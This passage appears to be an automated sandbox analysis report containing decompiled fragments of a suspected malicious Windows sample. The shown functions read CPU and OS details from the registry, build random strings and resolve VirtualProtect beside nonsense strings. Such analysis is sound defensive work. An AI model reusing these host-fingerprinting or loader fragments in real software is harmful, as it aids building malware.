                                                                                					E0040CFB8(_t125, _t91);
                                                                                					E00402C34(_t129 - 0x2c, 1, 0);
                                                                                					 *((char*)(_t129 - 4)) = 0;
                                                                                					E0040B593(_t129 - 0xe0, 0, _t125);
                                                                                					return E00421A61(0, _t125, _t91);
                                                                                				}
                                                                                				L17:
                                                                                			}





















                                                                                0x00417368
                                                                                0x00417368
                                                                                0x00417368
                                                                                0x0041736f
                                                                                0x00417376
                                                                                0x00417379
                                                                                0x0041737c
                                                                                0x0041737e
                                                                                0x0041738b
                                                                                0x0041738e
                                                                                0x00417391
                                                                                0x00417394
                                                                                0x00417397
                                                                                0x0041739f
                                                                                0x004173a2
                                                                                0x004173a5
                                                                                0x004173a8
                                                                                0x004173ac
                                                                                0x004173af
                                                                                0x004173b6
                                                                                0x004173be
                                                                                0x004173c0
                                                                                0x004173c1
                                                                                0x004173c9
                                                                                0x004173d3
                                                                                0x004173da
                                                                                0x004173dd
                                                                                0x004173e0
                                                                                0x00417443
                                                                                0x00417449
                                                                                0x00417455
                                                                                0x004173e2
                                                                                0x004173e2
                                                                                0x004173e2
                                                                                0x004173e9
                                                                                0x004173ea
                                                                                0x004173eb
                                                                                0x004173f0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004173f6
                                                                                0x004173f9
                                                                                0x004173fb
                                                                                0x004173fb
                                                                                0x004173fe
                                                                                0x00417404
                                                                                0x0041740a
                                                                                0x00417410
                                                                                0x0041740c
                                                                                0x0041740c
                                                                                0x0041740c
                                                                                0x00417415
                                                                                0x0041741a
                                                                                0x00417420
                                                                                0x0041741c
                                                                                0x0041741c
                                                                                0x0041741c
                                                                                0x00417424
                                                                                0x0041742a
                                                                                0x0041742a
                                                                                0x00417426
                                                                                0x00417426
                                                                                0x00417426
                                                                                0x0041742f
                                                                                0x00417433
                                                                                0x00417438
                                                                                0x00417441
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00417441
                                                                                0x0041745d
                                                                                0x00417462
                                                                                0x00417463
                                                                                0x0041746d
                                                                                0x00417472
                                                                                0x00417474
                                                                                0x00417476
                                                                                0x00417479
                                                                                0x00417480
                                                                                0x00417483
                                                                                0x00417486
                                                                                0x00417488
                                                                                0x00417492
                                                                                0x0041749c
                                                                                0x004174a9
                                                                                0x004174b0
                                                                                0x004174b7
                                                                                0x004174b8
                                                                                0x004174bf
                                                                                0x004174c4
                                                                                0x004174d1
                                                                                0x004174d4
                                                                                0x004174e5
                                                                                0x004174e6
                                                                                0x004174eb
                                                                                0x004174f5
                                                                                0x004174fb
                                                                                0x00417501
                                                                                0x0041750a
                                                                                0x0041750b
                                                                                0x00417512
                                                                                0x00417521
                                                                                0x00417528
                                                                                0x0041752c
                                                                                0x00417537
                                                                                0x00417542
                                                                                0x00417545
                                                                                0x00417551
                                                                                0x00417551
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0041736F
                                                                                • Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,00000034,0040B876,00000013), ref: 004173AF
                                                                                • __time64.LIBCMT ref: 004173B6
                                                                                  • Part of subcall function 0041F6BE: GetSystemTimeAsFileTime.KERNEL32(004173BB,?,?,?,004173BB,00000000), ref: 0041F6C9
                                                                                  • Part of subcall function 0041F6BE: __aulldiv.LIBCMT ref: 0041F6E9
                                                                                  • Part of subcall function 00417319: _malloc.LIBCMT ref: 0041731F
                                                                                  • Part of subcall function 00417319: GetTickCount.KERNEL32 ref: 0041732A
                                                                                  • Part of subcall function 00417319: _rand.LIBCMT ref: 0041733F
                                                                                  • Part of subcall function 00417319: wsprintfA.USER32 ref: 00417352
                                                                                  • Part of subcall function 0041F58A: __getptd.LIBCMT ref: 0041F58F
                                                                                • _rand.LIBCMT ref: 004173E2
                                                                                  • Part of subcall function 0041F59C: __getptd.LIBCMT ref: 0041F59C
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0041745D
                                                                                Strings
                                                                                • invalid string position, xrefs: 00417458
                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00417383
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time__getptd_rand$CountFileH_prolog3_SleepSystemTickXinvalid_argument__aulldiv__time64_mallocstd::_wsprintf
                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$invalid string position
                                                                                • API String ID: 4021585639-3173898365
                                                                                • Opcode ID: e5a0575f774059578f42c4b227a2ec8b00996334371433c7ab8e47d59f76ade4
                                                                                • Instruction ID: f9b750d0c42da020d266cd9b9ff5f8d26ac7539b86ccd1569070ce2b83a70b12
                                                                                • Opcode Fuzzy Hash: e5a0575f774059578f42c4b227a2ec8b00996334371433c7ab8e47d59f76ade4
                                                                                • Instruction Fuzzy Hash: BD319270E04205AFDB14EFA9D8825DDBBB5FF44704F20482FF551E7282D6785981CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00415636(void* __edi, char* __esi) {
                                                                                				void* __ebx;
                                                                                				signed int _t18;
                                                                                				void* _t37;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                				char* _t43;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                
                                                                                				_t43 = __esi;
                                                                                				_t42 = __edi;
                                                                                				_t44 = _t46 - 0x18c;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                                				 *(_t44 - 0x7c) = 0;
                                                                                				 *(_t44 - 0x7c) = 0xff;
                                                                                				 *(_t44 + 0x88) = 0;
                                                                                				E00427E30(_t44 + 0x89, 0, 0xfe);
                                                                                				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119, _t44 - 0x80) == 0) {
                                                                                					RegQueryValueExA( *(_t44 - 0x80), "ProcessorNameString", 0, 0, _t44 + 0x88, _t44 - 0x7c);
                                                                                				}
                                                                                				RegCloseKey( *(_t44 - 0x80));
                                                                                				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                                				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                				 *_t43 = 0;
                                                                                				E0040381A(_t43, _t44 - 0x78);
                                                                                				_pop(_t37);
                                                                                				return E0041DEB4(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                                			}











                                                                                0x00415636
                                                                                0x00415636
                                                                                0x00415637
                                                                                0x00415644
                                                                                0x0041564b
                                                                                0x0041565f
                                                                                0x00415664
                                                                                0x0041566b
                                                                                0x00415671
                                                                                0x00415695
                                                                                0x004156ac
                                                                                0x004156ac
                                                                                0x004156b5
                                                                                0x004156c6
                                                                                0x004156cf
                                                                                0x004156d6
                                                                                0x004156dc
                                                                                0x004156de
                                                                                0x004156ed
                                                                                0x004156fa

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00415671
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,00000000), ref: 0041568D
                                                                                • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,?,?,?,?,00000000), ref: 004156AC
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004156B5
                                                                                • CharToOemA.USER32(?,?), ref: 004156C6
                                                                                Strings
                                                                                • ProcessorNameString, xrefs: 004156A4
                                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00415683
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                • API String ID: 2235053359-2804670039
                                                                                • Opcode ID: ba1ab00293c11aec3aa7fa498a02fb2cee0c446be2811ae5844238d174ba5f9a
                                                                                • Instruction ID: 69ed404512a34e2cf10b328672891c501a3ac911aa5c023b021ef7ad9592be83
                                                                                • Opcode Fuzzy Hash: ba1ab00293c11aec3aa7fa498a02fb2cee0c446be2811ae5844238d174ba5f9a
                                                                                • Instruction Fuzzy Hash: 43115EB194020CAFEB30AFA4DC85BEEBBBCEB04348F50802AF555D7152DE745A488B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00415AA2(void* __edi, char* __esi) {
                                                                                				void* __ebx;
                                                                                				signed int _t18;
                                                                                				void* _t37;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                				char* _t43;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                
                                                                                				_t43 = __esi;
                                                                                				_t42 = __edi;
                                                                                				_t44 = _t46 - 0x18c;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                                				 *(_t44 - 0x7c) = 0;
                                                                                				 *(_t44 - 0x7c) = 0xff;
                                                                                				 *(_t44 + 0x88) = 0;
                                                                                				E00427E30(_t44 + 0x89, 0, 0xfe);
                                                                                				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119, _t44 - 0x80) == 0) {
                                                                                					RegQueryValueExA( *(_t44 - 0x80), "ProductName", 0, 0, _t44 + 0x88, _t44 - 0x7c);
                                                                                				}
                                                                                				RegCloseKey( *(_t44 - 0x80));
                                                                                				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                                				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                				 *_t43 = 0;
                                                                                				E0040381A(_t43, _t44 - 0x78);
                                                                                				_pop(_t37);
                                                                                				return E0041DEB4(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                                			}











                                                                                0x00415aa2
                                                                                0x00415aa2
                                                                                0x00415aa3
                                                                                0x00415ab0
                                                                                0x00415ab7
                                                                                0x00415acb
                                                                                0x00415ad0
                                                                                0x00415ad7
                                                                                0x00415add
                                                                                0x00415b01
                                                                                0x00415b18
                                                                                0x00415b18
                                                                                0x00415b21
                                                                                0x00415b32
                                                                                0x00415b3b
                                                                                0x00415b42
                                                                                0x00415b48
                                                                                0x00415b4a
                                                                                0x00415b59
                                                                                0x00415b66

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00415ADD
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,00000000), ref: 00415AF9
                                                                                • RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?,?,?,00000000), ref: 00415B18
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00415B21
                                                                                • CharToOemA.USER32(?,?), ref: 00415B32
                                                                                Strings
                                                                                • ProductName, xrefs: 00415B10
                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00415AEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 2235053359-1787575317
                                                                                • Opcode ID: 8f814b6ac6bc03f31c073667abdc003f177ff691aa53d4298a7e9a4e4f70b092
                                                                                • Instruction ID: 5c41df40a66fda5b461640e06a6b98bc800ee5d084a06aecff0b6f72ad2190ef
                                                                                • Opcode Fuzzy Hash: 8f814b6ac6bc03f31c073667abdc003f177ff691aa53d4298a7e9a4e4f70b092
                                                                                • Instruction Fuzzy Hash: E1112EB194024CAFEB309FA4DC85BEEBBBCEB04348F50402AF555D7151DE745A488F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(76C70000,VirtualProtect), ref: 00C6C10A
                                                                                  • Part of subcall function 00C639B0: __vswprintf_c_l.LIBCMT ref: 00C639CE
                                                                                • lstrcpyW.KERNEL32 ref: 00C6C0CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc__vswprintf_c_llstrcpy
                                                                                • String ID: $Gotifo gon saniyoh tihehom mexexor peloxi$Lanewoq ceve sare$VirtualProtect$Wekoyil teniloh nax dovawi yataxa hikemeb
                                                                                • API String ID: 503509527-983023147
                                                                                • Opcode ID: 363fa4308ac81a362d1169744129f2f83c218e817faf142041b6f1376ec41a57
                                                                                • Instruction ID: a0d0ad64a75265c94980812f9616db889101bbed6ce783bd98bcb83ea2e0e42f
                                                                                • Opcode Fuzzy Hash: 363fa4308ac81a362d1169744129f2f83c218e817faf142041b6f1376ec41a57
                                                                                • Instruction Fuzzy Hash: 9E2129B0D08389DFEB14CF99C985BBEBBB1AB44304F148058D5526B381D7B55B08CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00415153(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t24;
                                                                                				intOrPtr _t39;
                                                                                				void* _t44;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t44 - 0x14, 0);
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                				_t39 =  *0x44a43c; // 0x37b10a0
                                                                                				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t44 + 8)), E0040F10D(_t44 - 0x14, 0x448c4c));
                                                                                				_t43 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t39 == 0) {
                                                                                						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                						_push(_t44 - 0x10);
                                                                                						_t24 = E0040F1BF(__ebx, _t39, _t43, __eflags);
                                                                                						__eflags = _t24 - 0xffffffff;
                                                                                						if(_t24 == 0xffffffff) {
                                                                                							E0041E1C5(_t44 - 0x20, "bad cast");
                                                                                							E00421126(_t44 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t43 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						 *0x44a43c =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t44 - 0x10)));
                                                                                						E0041D711(__eflags, _t43);
                                                                                					} else {
                                                                                						_t43 = _t39;
                                                                                					}
                                                                                				}
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t44 - 0x14);
                                                                                				return E00421A4D(_t43);
                                                                                			}







                                                                                0x00415153
                                                                                0x0041515a
                                                                                0x00415164
                                                                                0x00415169
                                                                                0x0041516d
                                                                                0x00415178
                                                                                0x00415185
                                                                                0x0041518a
                                                                                0x0041518e
                                                                                0x00415192
                                                                                0x00415198
                                                                                0x0041519e
                                                                                0x0041519f
                                                                                0x004151a6
                                                                                0x004151a9
                                                                                0x004151b3
                                                                                0x004151c1
                                                                                0x004151c1
                                                                                0x004151c6
                                                                                0x004151cb
                                                                                0x004151d1
                                                                                0x004151d7
                                                                                0x00415194
                                                                                0x00415194
                                                                                0x00415194
                                                                                0x00415192
                                                                                0x004151dd
                                                                                0x004151e4
                                                                                0x004151f0

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0041515A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00415164
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 004151B3
                                                                                • __CxxThrowException@8.LIBCMT ref: 004151C1
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 004151D1
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 004151D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 0c18c1146e303d3250477eb122bf2e9a362c33ea7865ee22144f26caed177d09
                                                                                • Instruction ID: fe24bb0cdfa607c4d1967f0efca930ab9c7078c3bb1c8f71cade9ed0dc2268a2
                                                                                • Opcode Fuzzy Hash: 0c18c1146e303d3250477eb122bf2e9a362c33ea7865ee22144f26caed177d09
                                                                                • Instruction Fuzzy Hash: E7018E31D00625EACB11EBA1DC426ED73306F50768F60022BE820BB2E1DB7C9E458798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0041914C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t39;
                                                                                				void* _t44;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t44 - 0x14, 0);
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                				_t39 =  *0x44a444; // 0x37b15b8
                                                                                				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t44 + 8)), E0040F10D(_t44 - 0x14, 0x44ac58));
                                                                                				_t43 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t39 == 0) {
                                                                                						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                						_t23 = E00419284(_t44 - 0x10, __edx, _t43, __eflags);
                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                						if(_t23 == 0xffffffff) {
                                                                                							E0041E1C5(_t44 - 0x20, "bad cast");
                                                                                							E00421126(_t44 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t43 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						 *0x44a444 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t44 - 0x10)));
                                                                                						E0041D711(__eflags, _t43);
                                                                                					} else {
                                                                                						_t43 = _t39;
                                                                                					}
                                                                                				}
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t44 - 0x14);
                                                                                				return E00421A4D(_t43);
                                                                                			}







                                                                                0x0041914c
                                                                                0x00419153
                                                                                0x0041915d
                                                                                0x00419162
                                                                                0x00419166
                                                                                0x00419171
                                                                                0x0041917e
                                                                                0x00419183
                                                                                0x00419187
                                                                                0x0041918b
                                                                                0x00419191
                                                                                0x00419197
                                                                                0x0041919d
                                                                                0x004191a0
                                                                                0x004191aa
                                                                                0x004191b8
                                                                                0x004191b8
                                                                                0x004191bd
                                                                                0x004191c2
                                                                                0x004191c8
                                                                                0x004191ce
                                                                                0x0041918d
                                                                                0x0041918d
                                                                                0x0041918d
                                                                                0x0041918b
                                                                                0x004191d4
                                                                                0x004191db
                                                                                0x004191e7

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00419153
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041915D
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 004191AA
                                                                                • __CxxThrowException@8.LIBCMT ref: 004191B8
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 004191C8
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 004191CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 7c73b212e5d903ebed51fa4634109b466a8aef8befe43c9a008ffedd3640a4ea
                                                                                • Instruction ID: 6e793c7f693eafb92b2f1e4c69a61cd9008c6e99dc61860fa0b33d6efeadfa00
                                                                                • Opcode Fuzzy Hash: 7c73b212e5d903ebed51fa4634109b466a8aef8befe43c9a008ffedd3640a4ea
                                                                                • Instruction Fuzzy Hash: 7301C071940129ABDB10EB61DC566ED73706F10768F54022EF8207B2E1DB7C8E85879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E004191E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t38;
                                                                                				void* _t43;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t43 - 0x14, 0);
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                                				_t38 =  *0x44a448; // 0x37b15e0
                                                                                				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t43 + 8)), E0040F10D(_t43 - 0x14, 0x44ac5c));
                                                                                				_t42 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t38 == 0) {
                                                                                						_push( *((intOrPtr*)(_t43 + 8)));
                                                                                						_t23 = E00419309(_t43 - 0x10, _t42, __eflags);
                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                						if(_t23 == 0xffffffff) {
                                                                                							E0041E1C5(_t43 - 0x20, "bad cast");
                                                                                							E00421126(_t43 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t42 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						 *0x44a448 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t43 - 0x10)));
                                                                                						E0041D711(__eflags, _t42);
                                                                                					} else {
                                                                                						_t42 = _t38;
                                                                                					}
                                                                                				}
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t43 - 0x14);
                                                                                				return E00421A4D(_t42);
                                                                                			}







                                                                                0x004191e8
                                                                                0x004191ef
                                                                                0x004191f9
                                                                                0x004191fe
                                                                                0x00419202
                                                                                0x0041920d
                                                                                0x0041921a
                                                                                0x0041921f
                                                                                0x00419223
                                                                                0x00419227
                                                                                0x0041922d
                                                                                0x00419233
                                                                                0x00419239
                                                                                0x0041923c
                                                                                0x00419246
                                                                                0x00419254
                                                                                0x00419254
                                                                                0x00419259
                                                                                0x0041925e
                                                                                0x00419264
                                                                                0x0041926a
                                                                                0x00419229
                                                                                0x00419229
                                                                                0x00419229
                                                                                0x00419227
                                                                                0x00419270
                                                                                0x00419277
                                                                                0x00419283

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004191EF
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004191F9
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00419246
                                                                                • __CxxThrowException@8.LIBCMT ref: 00419254
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 00419264
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041926A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 18315f0849abbcf9c4bc0f4ff04ff5327509c40e9d3e25fa2dda257022faad94
                                                                                • Instruction ID: bb5d8e8de63ca5ab58095220fe5bed3a7b1b0126a0e4fce9aaf95c8c6aff3a7e
                                                                                • Opcode Fuzzy Hash: 18315f0849abbcf9c4bc0f4ff04ff5327509c40e9d3e25fa2dda257022faad94
                                                                                • Instruction Fuzzy Hash: B601C431D40124ABCB10EB61DC526ED73306F10768F60066AF8207B2D1DB7C5E85879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E004151F1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t38;
                                                                                				void* _t43;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t43 - 0x14, 0);
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                                				_t38 =  *0x44a440; // 0x0
                                                                                				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t43 + 8)), E0040F10D(_t43 - 0x14, 0x44ac54));
                                                                                				_t42 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t38 == 0) {
                                                                                						_push( *((intOrPtr*)(_t43 + 8)));
                                                                                						_t23 = E0041528D(_t43 - 0x10, _t42, __eflags);
                                                                                						__eflags = _t23 - 0xffffffff;
